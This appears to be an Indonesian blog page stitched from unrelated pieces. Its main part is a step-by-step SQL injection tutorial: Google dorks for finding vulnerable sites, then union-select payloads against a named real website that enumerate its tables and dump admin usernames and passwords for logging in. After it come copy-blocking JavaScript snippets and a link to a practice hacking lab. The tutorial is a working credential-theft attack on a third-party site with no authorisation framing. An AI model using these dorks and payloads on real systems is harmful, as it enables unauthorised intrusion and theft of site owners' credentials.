news_display.php?getid=
index2.php?option=
ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()
Sebenarnya dork itu banyak tapi kemnculan dork-dork baru tergantung kreatifitas individu masing-masing
Copas ( copy paste ) salah satu dork tersebut ke google search
Setelah itu kita pilih salah satu url dari hasil dork tersebut
Contoh:
http://www.zenfocus.com/partners.php?id=2
sekarang kita tes url tersebuta apakah vuln SQLi apa tidak dengan menambahkan tanda ‘ di belakang angka
[ by : X Software Engineering 1 ] Page 8
contoh:
http://www.zenfocus.com/partners.php?id=2’
dan hasil yang kita dapat adalah
Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by”
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali
Contoh:
http://www.zenfocus.com/partners.php?id=2 order by 1--
ç no error
http://www.zenfocus.com/partners.php?id=2 order by 2--
ç no error
http://www.zenfocus.com/partners.php?id=2 order by 3--
ç no error
http://www.zenfocus.com/partners.php?id=2 order by 4--
ç no error
http://www.zenfocus.com/partners.php?id=2 order by 5--
ç no error
http://www.zenfocus.com/partners.php?id=2 order by 6--
ç no error
http://www.zenfocus.com/partners.php?id=2 order by 7--
ç error
[ by : X Software Engieering 1] Page 9
Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6--
[ by :X Software Engineering 1] Page 10
Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6--
Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda --
[ by : X Software Engineering 1] Page 11
Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”
[ by : X Software Engineering 1] Page 12
dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai hackbar yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL
è MySQL è MySQL CHAR()
setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok sehingga perintah kita menjadi
“ http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)-- “
Setelah itu tekan Execute
Dan hasilnya
[ by :  X Software Engineering 1] Page 13
Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin—
tekan Execute
[ by : X Software Engineering 1 ] Page 14
Dan hasilnya
Setelah itu tinggal nyari admin loginya

Java Script Untuk Protect Web

credit javascript.internet.com/www.javascript.com

Quote:// disable keydown ctrl c & v

<script language="javascript">
function onkeydown() {
alert("dilarang copas"); // commentnya
// current pressed key
var pressedKey = String.fromCharCode(event.keyCode).toLowerCase();
if (event.ctrlKey && (pressedKey == "c" ||
pressedKey == "v")) {
// disable key press porcessing
event.returnValue = false;
}
} // onkeydown
</script>



<script language="Javascript">
//Disable klik kanan di mouse kamu


//pesan yang akan ditampilkan bila kamu klik kanan
var message="Maaf Tidak Boleh Copy Paste dengan Click Kanan";

//Kode selanjutnya merupakan fungsi untuk mendisable klik kanannya
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("alert(message);return false")

</SCRIPT>


<script TYPE="text/javascript">
<!--
//Disable select-text script (IE4+, NS6+)
///////////////////////////////////
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
// -->
</SCRIPT>

wesite hacking lab ......

wesite hacking lab ......
hi guyz as practice makes man perfect so for website hacking practice we need a lab
to download it
go to the following link

Download this web Application from here:
Klik Di Sini mas Broww

u need xampp for this download it from here
Klik Di Sini Mas Broww

sidebarads

secondrightads

dailyvid

footerads

apakah artikel kami bermanfaat ?

Pages

Powered By Blogger

Translate

Pengikut

windows 7 secret